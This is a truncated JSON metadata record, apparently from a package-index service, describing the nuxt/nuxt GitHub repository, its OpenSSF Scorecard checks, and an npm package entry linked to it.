{"id":3601,"url":"https://github.com/nuxt/nuxt","last_synced_at":"2026-05-14T03:30:47.247Z","repository":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-05-06T23:06:53.000Z","size":137282,"stargazers_count":60168,"open_issues_count":884,"forks_count":5596,"subscribers_count":775,"default_branch":"main","last_synced_at":"2026-05-07T02:02:57.794Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-05-07T00:28:57.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":323,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":33007553,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-13T13:14:54.681Z","status":"online","status_checked_at":"2026-05-14T02:00:06.663Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"owner":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":64,"last_synced_at":"2026-04-24T22:38:03.396Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":118587,"followers":4620,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-04-24T22:38:03.396Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"packages":[{"id":11248936,"name":"@lgcardenas/builder","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"lgcardenas","versions_count":1,"first_release_published_at":"2025-01-09T12:42:30.269Z","latest_release_published_at":"2025-01-09T12:42:30.269Z","latest_release_number":"2.18.3","last_synced_at":"2026-05-11T01:23:05.781Z","created_at":"2025-01-09T13:58:47.296Z","updated_at":"2026-05-11T01:23:05.782Z","registry_url":"https://www.npmjs.com/package/@lgcardenas/builder","install_command":"npm install @lgcardenas/builder","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"beta":"2.18.3","latest":"2.18.3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-24T15:11:02.000Z","size":136837,"stargazers_count":60120,"open_issues_count":949,"forks_count":5591,"subscribers_count":777,"default_branch":"main","last_synced_at":"2026-04-24T20:04:41.708Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-24T18:27:37.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":317,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32304464,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-26T09:34:17.070Z","status":"ssl_error","status_checked_at":"2026-04-26T09:34:00.993Z","response_time":129,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:04.040Z","dependent_packages_count":0,"downloads":11,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.249126558099604,"dependent_packages_count":36.53149576107127,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.890311159585437},"purl":"pkg:npm/%40lgcardenas/builder","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@lgcardenas/builder","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@lgcardenas/builder","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@lgcardenas/builder/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-08T05:00:23.926Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":838,"past_year_pull_requests_count":1377,"past_year_avg_time_to_close_issue":720221.4700665189,"past_year_avg_time_to_close_pull_request":229718.65300285988,"past_year_issues_closed_count":451,"past_year_pull_requests_closed_count":1049,"past_year_pull_request_authors_count":127,"past_year_issue_a